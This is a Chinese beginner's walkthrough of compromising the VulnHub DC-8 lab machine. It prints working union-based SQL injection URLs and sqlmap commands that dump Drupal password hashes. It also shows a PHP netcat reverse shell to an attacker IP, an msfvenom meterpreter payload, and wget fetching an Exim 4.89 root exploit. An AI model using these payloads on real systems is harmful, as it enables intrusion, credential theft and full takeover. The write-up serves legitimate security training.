当前位置:   article > 正文

靶机DC-8(详细渗透,适合新手渗透)_dc-8靶机

dc-8靶机

目录

靶机DC-8 (详细渗透,适合新手渗透)

0x01靶机描述

靶机信息

链接https://www.vulnhub.com/entry/dc-8,367/
发布日期2019年9月4日
作者DCAU
难度简单

0x02环境搭建

1. 下载并导入靶机

打开vmware-文件-打开-DC-8.ova

在这里插入图片描述在这里插入图片描述

2. 查看网络适配器

将靶机网络适配器改为NAT模式
在这里插入图片描述

3. 启动靶机

点击 ▶靶机,开启成功
在这里插入图片描述

0x03靶机渗透

一、 信息收集

1. 主机发现

在这里插入图片描述
在这里插入图片描述

2. 端口扫描

在这里插入图片描述

3. 详细扫描

在这里插入图片描述

4. 目录扫描

在这里插入图片描述

5. gobuster目录扫描

为了避免漏扫,gobuster再进行目录扫描

在这里插入图片描述

6. 网站指纹识别

在这里插入图片描述

二、 漏洞挖掘

手工sql注入
1. 通过手工验证,此处url含有sql注入漏洞

http://192.168.30.206/?nid=2 and 1=1 --+
请添加图片描述

http://192.168.30.206/?nid=2 and 1=2 --+
请添加图片描述

2. 判断字段数

http://192.168.30.206/?nid=2 order by 1 --+
请添加图片描述

http://192.168.30.206/?nid=2 order by 2 --+
请添加图片描述

所以可以看出字段数为1

3. 判断显示位置

http://192.168.30.206/?nid=-2 union select 1 --+
请添加图片描述

4. 查看当前数据库

请添加图片描述

5. 查找库d7db中所有的表

http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+

请添加图片描述

6. 查找uesrs表中所有的列

http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+

请添加图片描述

7. 查询表中的数据

http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+
请添加图片描述

http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+

请添加图片描述

sqlmap自动化执行
1. 查当前数据库
sqlmap -u 'http://192.168.30.206/?nid=2' -current-db
  • 1

请添加图片描述请添加图片描述

2. 查表
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db --tables
  • 1

请添加图片描述

3. 查列
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users --columns
  • 1

请添加图片描述请添加图片描述

4. 查数据
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users -C login,name,pass --dump
  • 1

请添加图片描述请添加图片描述查询到两组数据

admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john  $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
  • 1
  • 2
4. 使用John进行暴力破解

请添加图片描述破解出john的密码trutle

5. 可以将破解出来的密码尝试ssh远程登录

发现ssh远程登录失败,发现需要使用公私钥登录
请添加图片描述123

6. 在此网页尝试登录,该网页由前面目录扫描得到
http://192.168.30.206/user
  • 1

登录成功
请添加图片描述请添加图片描述

  • 远程代码执行漏洞
1.找到可以编辑php代码的地方

请添加图片描述请添加图片描述

2.尝试写phpinfo代码

请添加图片描述请添加图片描述请添加图片描述
发现保存并提交后并没有任何显示。按照网上的说法,php代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。

三、 漏洞利用

方法一:
1. 编写反弹shell脚本

我们尝试执行PHP反弹shell脚本,将原有的<p>flag</p>进行保留,防止报错

<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>
  • 1
  • 2
  • 3
  • 4

请添加图片描述

2.保存提交前开启kali进行监听

请添加图片描述

3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell

请添加图片描述请添加图片描述请添加图片描述

方法二:
1. 使用msfvenom制作反弹shell脚本
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999
 R >php_shell.txt
  • 1
  • 2

请添加图片描述

2.将php代码复制到网站中

请添加图片描述

3. kali设置msf选项,进行监听

请添加图片描述请添加图片描述
请添加图片描述

4.提交代码(此时后台默认执行所编写的php脚本代码)

请添加图片描述

5. 拿到shell,并用python打开一个标准shell
python -c 'import pty;pty.spawn("/bin/bash")'
  • 1

请添加图片描述

四、 提权

1.find 命令查找具有sudo权限的命令,发现exim4在使用时具有root权限`
find / -perm -u=s -type f 2>/dev/null
  • 1

请添加图片描述

2.查看命令exim4命令版本

Exim version 4.89
请添加图片描述

3.利用serachsploit查找exim命令的漏洞

请添加图片描述

4.进行查看用法,发现有两个使用方法

请添加图片描述

5.将文件复制到/tmp目录,并用python打开一个临时的HTTP服务

请添加图片描述

6.将46996.sh下载到靶机
wget http://192.168.30.182/46996.sh
  • 1

请添加图片描述

进行赋权
请添加图片描述

执行,但是发现两种方法均发生错误
请添加图片描述

原因:这个报错是由于windows系统下编辑然后上传到linux系统执行导致的
解决方案:本地编辑查看文件类型:set ff=unix
请添加图片描述

7.然后我们再重新进行上传

请添加图片描述

使用第二个提权命令进行提权成功

./46996.sh -m netcat
  • 1

请添加图片描述
请添加图片描述

8.查看flag

请添加图片描述

0x04实验总结

这个靶机考察了目录扫描,sql注入,远程代码执行,反弹shell,提权时使用find查找可以执行的命令,对命令exim的版本提权漏洞等,是一个不错的靶机,适合新手来渗透

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/687429
推荐阅读
相关标签
  

闽ICP备14008679号